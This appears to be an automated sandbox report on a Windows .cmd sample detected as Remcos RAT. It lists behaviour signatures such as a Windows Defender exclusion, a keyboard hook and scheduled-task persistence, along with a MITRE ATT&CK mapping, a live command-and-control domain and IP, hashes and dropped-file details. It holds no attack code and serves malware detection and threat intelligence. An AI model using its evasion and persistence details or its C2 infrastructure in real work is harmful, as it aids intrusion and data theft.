    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation

    Stealing of Sensitive Information

    barindex
    Yara detected Remcos RAT
    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\brotha\logs.dat, type: DROPPED

    Remote Access Functionality

    barindex
    Detected Remcos RAT
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-K9847Q
    Yara detected Remcos RAT
    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\brotha\logs.dat, type: DROPPED

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation    		1
    DLL Side-Loading    		12
    Process Injection    		1
    Masquerading    		11
    Input Capture    		21
    Security Software Discovery    		Remote Services11
    Input Capture    		1
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts112
    Command and Scripting Interpreter    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		1
    Disable or Modify Tools    		LSASS Memory2
    Process Discovery    		Remote Desktop Protocol1
    Archive Collected Data    		1
    Non-Standard Port    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    PowerShell    		Logon Script (Windows)Logon Script (Windows)41
    Virtualization/Sandbox Evasion    		Security Account Manager41
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared Drive1
    Remote Access Software    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
    Process Injection    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput Capture1
    Ingress Tool Transfer    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Obfuscated Files or Information    		LSA Secrets1
    File and Directory Discovery    		SSHKeylogging2
    Non-Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain Credentials21
    System Information Discovery    		VNCGUI Input Capture12
    Application Layer Protocol    		Data Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431053 Sample: UrgenteNotificationRef.cmd Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 81 embargogo237.duckdns.org 2->81 83 geoplugin.net 2->83 93 Antivirus detection for URL or domain 2->93 95 Yara detected Remcos RAT 2->95 97 Sigma detected: Remcos 2->97 99 Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet 2->99 13 cmd.exe 1 2->13         started        16 cmd.exe 1 2->16         started        signatures3 101 Uses dynamic DNS services 81->101 process4 signatures5 121 Very long command line found 13->121 18 cmd.exe 1 13->18         started        21 conhost.exe 13->21         started        23 conhost.exe 16->23         started        25 conhost.exe 16->25         started        process6 signatures7 91 Very long command line found 18->91 27 powershell.exe 16 18->27         started        31 conhost.exe 18->31         started        33 cmd.exe 1 18->33         started        process8 file9 79 C:\Users\user\AppData\...79etwork28681Man.cmd, DOS 27->79 dropped 115 Suspicious powershell command line found 27->115 117 Adds a directory exclusion to Windows Defender 27->117 35 cmd.exe 27->35         started        38 powershell.exe 37 27->38         started        40 powershell.exe 37 27->40         started        42 2 other processes 27->42 signatures10 process11 signatures12 103 Very long command line found 35->103 44 cmd.exe 35->44         started        47 conhost.exe 35->47         started        105 Loading BitLocker PowerShell Module 38->105 49 conhost.exe 38->49         started        51 conhost.exe 40->51         started        53 conhost.exe 42->53         started        process13 signatures14 119 Very long command line found 44->119 55 powershell.exe 44->55         started        60 conhost.exe 44->60         started        62 cmd.exe 44->62         started        process15 dnsIp16 85 embargogo237.duckdns.org 45.74.19.121, 10521, 49737 HVC-ASUS United States 55->85 87 geoplugin.net 178.237.33.50, 49739, 80 ATOM86-ASATOM86NL Netherlands 55->87 77 C:\Users\user\AppData\Roaming\...\logs.dat, data 55->77 dropped 107 Detected Remcos RAT 55->107 109 Suspicious powershell command line found 55->109 111 Adds a directory exclusion to Windows Defender 55->111 113 Installs a global keyboard hook 55->113 64 powershell.exe 55->64         started        67 powershell.exe 55->67         started        69 powershell.exe 55->69         started        71 powershell.exe 55->71         started        file17 signatures18 process19 signatures20 89 Loading BitLocker PowerShell Module 64->89 73 conhost.exe 64->73         started        75 conhost.exe 67->75         started        process21

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    UrgenteNotificationRef.cmd11%ReversingLabs

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    geoplugin.net4%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://geoplugin.net/json.gp100%URL Reputationphishing
    http://crl.m0%URL Reputationsafe
    http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
    http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
    https://contoso.com/0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    http://crl.microsoft00%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    embargogo237.duckdns.org
    		45.74.19.121
    		truetrue
      		unknown
      geoplugin.net
      		178.237.33.50
      		truefalseunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://geoplugin.net/json.gptrue
      • URL Reputation: phishing
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.1710436376.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1765702553.0000000005A2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1839873781.000000000556E000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        https://aka.ms/winsvr-2022-pshelppowershell.exe, 0000001E.00000002.2113103855.0000000004A93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2105453899.0000000000A88000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          http://crl.mpowershell.exe, 0000000C.00000002.1857143467.0000000007CD2000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000C.00000002.1825292388.0000000004643000.00000004.00000800.00020000.00000000.sdmptrue
          • URL Reputation: malware
          • URL Reputation: malware
          		unknown
          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000007.00000002.1704963199.00000000046A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1754696525.0000000004B14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1825292388.0000000004643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1925326685.0000000004B95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2027065899.0000000004E95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2113103855.0000000004A93000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.1670797373.00000000054C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1670797373.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1704963199.0000000004551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1754696525.00000000049C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1825292388.0000000004501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1882584365.0000000004937000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1882584365.0000000004949000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1925326685.0000000004A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2027065899.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2113103855.0000000004961000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000C.00000002.1825292388.0000000004643000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000007.00000002.1704963199.00000000046A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1754696525.0000000004B14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1825292388.0000000004643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1925326685.0000000004B95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2027065899.0000000004E95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2113103855.0000000004A93000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/powershell.exe, 0000000C.00000002.1839873781.000000000556E000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.1710436376.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1765702553.0000000005A2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1839873781.000000000556E000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://contoso.com/Licensepowershell.exe, 0000000C.00000002.1839873781.000000000556E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 0000000C.00000002.1839873781.000000000556E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.1670797373.0000000005502000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1704963199.0000000004551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1754696525.00000000049C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1825292388.0000000004501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1882584365.0000000004965000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1925326685.0000000004A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2027065899.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2113103855.0000000004961000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://github.com/Pester/Pesterpowershell.exe, 0000000C.00000002.1825292388.0000000004643000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://crl.microsoft0powershell.exe, 00000017.00000002.1893864511.0000000006FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        45.74.19.121
                        		embargogo237.duckdns.orgUnited States
                        		29802HVC-ASUStrue
                        178.237.33.50
                        		geoplugin.netNetherlands
                        		8455ATOM86-ASATOM86NLfalse

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1431053
                        Start date and time:2024-04-24 14:09:37 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 7m 12s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:33
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:UrgenteNotificationRef.cmd
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winCMD@43/40@2/2
                        EGA Information:
                        • Successful, ratio: 40%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 275
                        • Number of non-executed functions: 28
                        Cookbook Comments:
                        • Found application associated with file extension: .cmd

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target powershell.exe, PID 7548 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 7680 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 7884 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        13:10:45Task SchedulerRun new task: OneNote 28681 path: C:\Users\user\AppData\Roaming\Network28681Man.cmd
                        14:10:29API Interceptor222901x Sleep call for process: powershell.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        45.74.19.121URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                          cf9dPUbn3C.exeGet hashmaliciousRemcosBrowse
                            3hHHxU2r9a.exeGet hashmaliciousRemcosBrowse
                              April_2024_discount_Voucher-Unique-d-File.cmdGet hashmaliciousUnknownBrowse
                                AprilDiscountVoucher.exeGet hashmaliciousQuasarBrowse
                                  April_2024_discount_Voucher-Unique-d-File.batGet hashmaliciousUnknownBrowse
                                    178.237.33.50107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    • geoplugin.net/json.gp
                                    URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                    • geoplugin.net/json.gp
                                    OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                    • geoplugin.net/json.gp
                                    fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                    • geoplugin.net/json.gp
                                    1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                    • geoplugin.net/json.gp
                                    #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                    • geoplugin.net/json.gp
                                    TcnD64eVFK.exeGet hashmaliciousRemcosBrowse
                                    • geoplugin.net/json.gp
                                    DHL Express Courier Pickup Confirmation CBJ231025122456.exeGet hashmaliciousRemcosBrowse
                                    • geoplugin.net/json.gp
                                    Quotation.xlsGet hashmaliciousRemcosBrowse
                                    • geoplugin.net/json.gp
                                    BRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    • geoplugin.net/json.gp

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    geoplugin.net107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    • 178.237.33.50
                                    URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                    • 178.237.33.50
                                    OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                    • 178.237.33.50
                                    fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                    • 178.237.33.50
                                    1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                    • 178.237.33.50
                                    HFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                    • 178.237.33.50
                                    TcnD64eVFK.exeGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    DHL Express Courier Pickup Confirmation CBJ231025122456.exeGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    Quotation.xlsGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    embargogo237.duckdns.orgURGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                    • 45.74.19.121

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    HVC-ASUSURGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                    • 45.74.19.121
                                    https://magnisteel.lk/4765445b-32c6-49b0-83e6-1d93765276ca.phpGet hashmaliciousHTMLPhisherBrowse
                                    • 107.155.77.34
                                    YKLjlQEZKY.elfGet hashmaliciousMiraiBrowse
                                    • 46.21.151.191
                                    SocUwyIjOh.elfGet hashmaliciousMiraiBrowse
                                    • 46.21.151.165
                                    Payment Advice.exeGet hashmaliciousAgentTeslaBrowse
                                    • 94.100.26.91
                                    https://freesnippingtool.com/Get hashmaliciousUnknownBrowse
                                    • 23.111.140.234
                                    Credit_Details21367163050417024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                    • 107.155.77.34
                                    RFQ183494.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                    • 107.155.77.34
                                    setup.msiGet hashmaliciousScreenConnect ToolBrowse
                                    • 23.227.196.172
                                    cf9dPUbn3C.exeGet hashmaliciousRemcosBrowse
                                    • 45.74.19.121
                                    ATOM86-ASATOM86NL107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    • 178.237.33.50
                                    URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                    • 178.237.33.50
                                    OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                    • 178.237.33.50
                                    fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                    • 178.237.33.50
                                    1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                    • 178.237.33.50
                                    TcnD64eVFK.exeGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    DHL Express Courier Pickup Confirmation CBJ231025122456.exeGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    Quotation.xlsGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    BRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    • 178.237.33.50

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):965
                                    Entropy (8bit):5.0061630437862155
                                    Encrypted:false
                                    SSDEEP:12:tkbOnd6UGkMyGWKyGXPVGArwY3o/IomaoHNmGNArpv/mOAaNO+ao9W7iN5zzkw7T:qbCdVauKyGX85jrvXhNlT3/7sYDsro
                                    MD5:664DA71A99A7A7C426134240B73EF767
                                    SHA1:33EAC84BB6B07F00593F05413A64CD8738B8A6E7
                                    SHA-256:146F13F7649B0BB05ECAA2386D7E8DC23E5BA7B69A36919E17E994E63E9F7BA5
                                    SHA-512:DCA9DC8FE7ED040B134D138846C0F3BA940DBCBE9883E19E704D06B8CA737E3FE4EE08AC5F98814E804E7D7716B580FBC4F7971AAD9DDC3887565FD07C4C674D
                                    Malicious:false
                                    Preview:{. "geoplugin_request":"154.16.105.36",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Las Vegas",. "geoplugin_region":"Nevada",. "geoplugin_regionCode":"NV",. "geoplugin_regionName":"Nevada",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"839",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"36.1685",. "geoplugin_longitude":"-115.1164",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Los_Angeles",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):5829
                                    Entropy (8bit):4.898126932363785
                                    Encrypted:false
                                    SSDEEP:96:VCJ2Woe5n2k6Lm5emmXIG2gyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smAFRLcU6Y:oxoe5nVsm5emdTgkjDt4iWN3yBGHB9sX
                                    MD5:BB4887302071210501E562B7868F4DF8
                                    SHA1:AF2EBC1E83EDBC3D13356AD8EF498ED6B7B881EA
                                    SHA-256:C6DD78956B6C260612ED364D8A71CB09FC7CE4C93EC0AC103B2A085EA38D2579
                                    SHA-512:56D17DFA9407A23AAE28C930C8CF6A34FDC0AE8DE145B772F127DA2D055F243395CF1BEC8F0892BB0F73EFD6726D73A80A94BC08E3027FD02DB33AA8BBD15C93
                                    Malicious:false
